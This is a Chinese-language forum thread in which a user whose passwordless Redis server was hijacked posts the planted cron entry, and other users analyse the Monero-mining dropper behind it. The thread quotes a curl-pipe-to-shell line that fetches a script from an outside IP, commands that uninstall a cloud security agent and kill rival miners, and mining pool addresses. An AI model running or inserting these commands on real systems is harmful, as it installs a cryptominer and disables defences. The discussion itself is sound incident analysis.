robot 大佬有话说 :
大佬来看看这是干吗的,被黑了
昨晚装完服务器环境,redis没设密码就睡觉了 ,今天一看里面的数据没了,多了这一句话
大佬来看看这是干啥的,它都做了些什么
*/1 * * * * cur -fsSL http://146.71.79.230/363A3EDC10A2930DVNICE/init.sh |sh
;P
hasamol7468 大佬有话说 :
本帖最后由 hasamol7468 于 2020-3-5 10:24 编辑
:lol 这个是计划任务吧 可能是想导出redis这个信息到系统的计划任务crontab给你下毒?
init.sh是下载者无疑,大概看了一眼:
卸载阿里云盾:
if ps aux | grep -i ‘liyun’; then
$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash
$bbdir http://update.aegis.aliyun.com/download/
杀别的黑客的马:
kill_miner_proc()
{
netstat -anp | grep 185.71.65.238 | awk ‘{print $7}’ | awk -F'[/]’ ‘{print $1}’ | xargs -I % kill -9 %
里面好像有挖矿(关键字:miner)和扫描别人的服务器(关键字:scan)
挖矿配置文件:
http://178.15【断】7.91.26/ec8ce6ab/config.json
内容是挖门罗币
矿场1:xmr.f2pool.com:13531
矿场2:randomxmonero.hk.nicehash.com:3380
里面还有自我升级和添加ssh密钥
楼主最好检查下服务器,有问题就重装
拾谎 大佬有话说 :
redis没设置密码,还不用安全组禁止入网。勇士
robot 大佬有话说 :
拾谎 大佬有话说 : 2020-3-5 10:13
redis没设置密码,还不用安全组禁止入网。勇士
haha,谁能想到redis还能被黑呢yc009t
Kooness 大佬有话说 :
本帖最后由 Kooness 于 2020-3-5 10:19 编辑
好像是挖矿的,挖门罗币(Monero)的
悟雨 大佬有话说 :
卡巴直接把这地址封了
robot 大佬有话说 :
hasamol7468 大佬有话说 : 2020-3-5 10:13
这个是计划任务吧 可能是想导出redis这个信息到系统的计划任务crontab给你下毒?
init.sh是下载者无 …
给大佬递茶.jpg
dtkevin 大佬有话说 :
哈哈哈,看图说哈
https://gra.nx6x.com/images/2020/03/05/232c24b864bc48b934c4e07f36241899.png
robot 大佬有话说 :
dtkevin 大佬有话说 : 2020-3-5 10:27
哈哈哈,看图说哈
6666,我何时才能像你一样优秀
dtkevin 大佬有话说 :
robot 大佬有话说 : 2020-3-5 10:34
6666,我何时才能像你一样优秀
基于redis挖矿的,多数来自于一个源头。全球扫描感染。
你的系统命令还被修改了一部分,如果我没猜错的话